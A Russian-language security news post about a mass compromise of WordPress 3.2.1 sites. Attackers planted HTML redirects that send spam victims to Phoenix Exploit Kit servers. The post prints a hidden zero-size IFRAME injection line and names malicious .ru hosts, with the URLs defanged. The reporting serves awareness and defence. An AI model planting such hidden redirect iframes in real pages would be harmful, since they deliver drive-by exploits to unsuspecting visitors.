Специалисты по безопасности из M86 Security Labs обнаружили массовое заражение сотен сайтов на движке WordPress 3.2.1. Используя известную уязвимость устаревшей версии WordPress и уже опубликованные эксплоиты для него (1, 2), злоумышленники внедряют жертве в папку Uploads файл HTML с редиректом на страницу с набором эксплоитов Phoenix Exploit Kit.
Уже обнаружено как минимум 400 заражённых сайтов: выборка 1, выборка 2. Самим этим сайтам беспокоиться не о чём, они могут даже не заметить заражения. Злоумышленники используют их просто в качестве красивых URL, чтобы ссылка вызывала доверие у жертв (и чтобы проще обойти спам-фильтры), и рассылают спам, содержащий ссылку на вышеупомянутую страницу.
Вот фрагмент обфусцированного этой страницы.
Этот обфусцированный код ведёт на серверы из инфраструктуры Phoenix Exploit Kit. Проведя расшифровку вышеуказанного кода, можно расшифровать конкретные URL, куда происходит редирект. Например, horoshovsebudet.ru.
IFRAME style=”RIGHT: -8710px; WIDTH: 0px; POSITION: fixed; HEIGHT: 24px” src=”hxxp://horoshovsebudet.ru:8801/html/yveveqduclirb1.php” frameborder=”0″
Другой URL из той же инфраструктуры — hxxxp://monikabestolucci.ru:8801/html/yveveqduclirb1.php.
При этом злоумышленники используют технику Fast Flux для динамического изменения соответствия между IP-адресом и доменным именем, так что данному домену соответствуют десятки IP-адресов.
На сайте Phoenix Exploit Kit происходит распознавание юзер-агента жертвы и на него сваливается ряд экслоитов, характерных для его версии ОС и браузера. Например, при распознавании IE6 пользователь получает эксплоиты для Internet Explorer, Adobe PDF, Flash и Oracle Java.
Статистика эксплоитов с контрольной панели Phoenix Exploit Kit
Судя по следующему скриншоту исходного кода Phoenix Exploit Kit по какой-то причине игнорирует пользователей браузера Google Chrome.